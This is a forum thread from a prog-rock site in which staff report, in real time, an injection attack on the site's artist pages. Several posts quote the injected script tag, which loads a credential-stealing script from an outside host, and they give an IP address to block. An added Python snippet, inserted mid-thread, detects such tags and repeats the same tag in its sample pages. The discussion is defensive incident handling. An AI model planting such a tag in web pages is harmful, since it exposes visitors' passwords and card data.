Anathema: Left overs from the recent hack |
Atkingani
Special Collaborator Honorary Collaborator / Retired Admin Joined: October 21 2005 Location: Terra Brasilis Status: Offline Points: 12288 |
Topic: Anathema: Left overs from the recent hack Posted: December 28 2007 at 15:41 |
The main database is still off... maybe M@x is recovering it.
|
|
Guigo
~~~~~~ |
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 15:24 |
^ I'll send you a PM
The problem seems to have been resolved, in that the script references are removed and all artist content restored. M@X seems to have taken care of things.
In general: if this script does what it says on the pages Dean referred to, you should be fine if you run an up-to-date virus scanner on your computer. The script apparently tries to install software from the web that captures data like credit card numbers and passwords the moment they are typed in. Any good virus protection tool should catch those.
People who don't have one installed I would advise to install and run one (Avast is a good free solution that has protected me for 5 years now) before submitting online credit card orders or accessing online banking services.
Hope no big damage is done to anyone!
Edited by Angelo - December 28 2007 at 15:34 |
|
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promos for airplay can be sent to [email protected] |
|
Magic Mountain
Forum Senior Member Joined: March 21 2006 Location: United States Status: Offline Points: 163 |
Posted: December 28 2007 at 14:49 |
I have gone to the forum main page and did not see "the c.uc8010.com/0.js script address on the page" referred to above and my virus software did not catch it. The main page did not load and had the message "Error on the Page" in the lower left-hand corner of the browser. Does this mean the script has executed and all of my passwords and credit card information have been transmitted? What is my next step?
|
|
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: December 28 2007 at 13:40 |
My initial thoughts are confirmed - the Forum main page is also affected.
The 0.js script from c.uc8010.com is the same script that hit many websites back in November: http://www.websense.com/securitylabs/blog/blog.php?BlogID=160
If you see the c.uc8010.com/0.js script address on the page then it has not executed - the scary bit is when you don't see it, because it probably has executed, however apparently anti-virus software is catching it.
If you know how, then set your IP blocker to block address 61.188.39.218
If you are unprotected, then keep away from the PA until the problem is fixed.
|
|
What?
|
|
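A defender-side check for the situation described in this thread (the `<script src=http://c.uc8010.com/0.js></script>` tag found in artist data, which either runs or is merely displayed as text), as an added example that is not part of the original posts. The allow-list, the function and class names and the sample pages are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.progarchives.com"}

# A script tag that appears in *text* (i.e. it arrived HTML-escaped).
SCRIPT_IN_TEXT = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)

class ScriptAudit(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # (state, host, src)

    def _record(self, state, src):
        host = urlparse(src).hostname
        if host and host not in ALLOWED_HOSTS:
            self.findings.append((state, host, src))

    def handle_starttag(self, tag, attrs):
        # A real <script src=...> element: the browser will fetch and run it.
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self._record("executes", src)

    def handle_data(self, data):
        # The same markup as visible text: injected, but escaped on output.
        for match in SCRIPT_IN_TEXT.finditer(data):
            self._record("shown-as-text", match.group(1))

def audit(html):
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample pages (not captured from the real site).
SAMPLE_PAGES = {
    "artist_raw": "<td>Bio<script src=http://c.uc8010.com/0.js></script></td>",
    "artist_escaped": "<td>Bio&lt;script src=http://c.uc8010.com/0.js&gt;"
                      "&lt;/script&gt;</td>",
    "clean": '<script src="http://www.progarchives.com/js/menu.js"></script>'
             "<td>Bio</td>",
}

if __name__ == "__main__":
    for name, html in SAMPLE_PAGES.items():
        print(name, audit(html))
```

Either finding means the stored content was modified and needs restoring; "executes" additionally means visitors' browsers loaded the third-party script.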
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 13:16 |
Where did you find that, Dean?
Thank god we have NoScript, and that on most pages it is inserted in the wrong place (it's being displayed as text rather than executed...)
Edited by Angelo - December 28 2007 at 13:18 |
|
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: December 28 2007 at 12:56 |
Run and hide.
This one is nasty. It originates from China and is designed to attach itself to your browser for stealing passwords and credit card numbers.
|
|
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 12:55 |
^Not a lot I expect.... I sent the contents of the script to Bob, so he can pass it on to M@X.
|
|
Dim
Prog Reviewer Joined: April 17 2007 Location: Austin TX Status: Offline Points: 6890 |
Posted: December 28 2007 at 12:47 |
Damn, is there anything we can do?
|
|
|
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 12:40 |
Is M@X aware? Could be useful to temporarily disconnect the server from the web (either physically or through software) to avoid more damage...
|
|
Tuzvihar
Special Collaborator Honorary Collaborator Joined: May 18 2005 Location: C. Schinesghe Status: Offline Points: 13536 |
Posted: December 28 2007 at 12:32 |
I went to the Admin Zone and took the option Update artists (it loads very slow!) - it seems all data is gone!!! All I could find there is: <script src=http://c.uc8010.com/0.js></script>.
Edited by Tuzvihar - December 28 2007 at 12:36 |
|
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."
Charles Bukowski |
|
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: December 28 2007 at 12:12 |
Yep, this is a new attack - even the main forum page is taking minutes to load.
If there is anything you want me to do just ask, (not that the prospect of rebuilding the bio pages is cheering me up any).
|
|
|
chamberry
Special Collaborator Honorary Collaborator Joined: October 24 2005 Location: Puerto Rico Status: Offline Points: 9008 |
Posted: December 28 2007 at 11:39 |
Also, the streamable MP3s are missing.
|
|
|
|
Tuzvihar
Special Collaborator Honorary Collaborator Joined: May 18 2005 Location: C. Schinesghe Status: Offline Points: 13536 |
Posted: December 28 2007 at 11:36 |
I randomly checked also Le Orme, Porcupine Tree, Vangelis... It looks like it affected every artist page.
|
|
chamberry
Special Collaborator Honorary Collaborator Joined: October 24 2005 Location: Puerto Rico Status: Offline Points: 9008 |
Posted: December 28 2007 at 11:34 |
Just found out that John Zorn's band page looks weird too:
http://www.progarchives.com/artist.asp?id=2212 |
|
|
|
Easy Livin
Special Collaborator Honorary Collaborator / Retired Admin Joined: February 21 2004 Location: Scotland Status: Offline Points: 15585 |
Posted: December 28 2007 at 10:58 |
I think this must be a new bug. I've contacted M@x about it but it looks more prosaic.
|
|
Atkingani
Special Collaborator Honorary Collaborator / Retired Admin Joined: October 21 2005 Location: Terra Brasilis Status: Offline Points: 12288 |
Posted: December 28 2007 at 10:54 |
I checked randomly BACAMARTE page and there's a problem there too... and I cannot access properly the entire database right now.
Are we under attack?
Edited by Atkingani - December 28 2007 at 10:55 |
|
Tuzvihar
Special Collaborator Honorary Collaborator Joined: May 18 2005 Location: C. Schinesghe Status: Offline Points: 13536 |
Posted: December 28 2007 at 10:53 |
My post from the other thread:
I couldn't find it... |
|
Atkingani
Special Collaborator Honorary Collaborator / Retired Admin Joined: October 21 2005 Location: Terra Brasilis Status: Offline Points: 12288 |
Posted: December 28 2007 at 10:50 |
I'm afraid the problem could be worse...
Check the ULVER page:
|
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 10:35 |
Van Der Graaff Generator bio is also damaged and the picture gone....
|
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 08:11 |
I found this in Report Bugs here: http://www.progarchives.com/forum/forum_posts.asp?TID=44668
Probably also other bios are affected...
Edited by Angelo - December 28 2007 at 09:42 |
|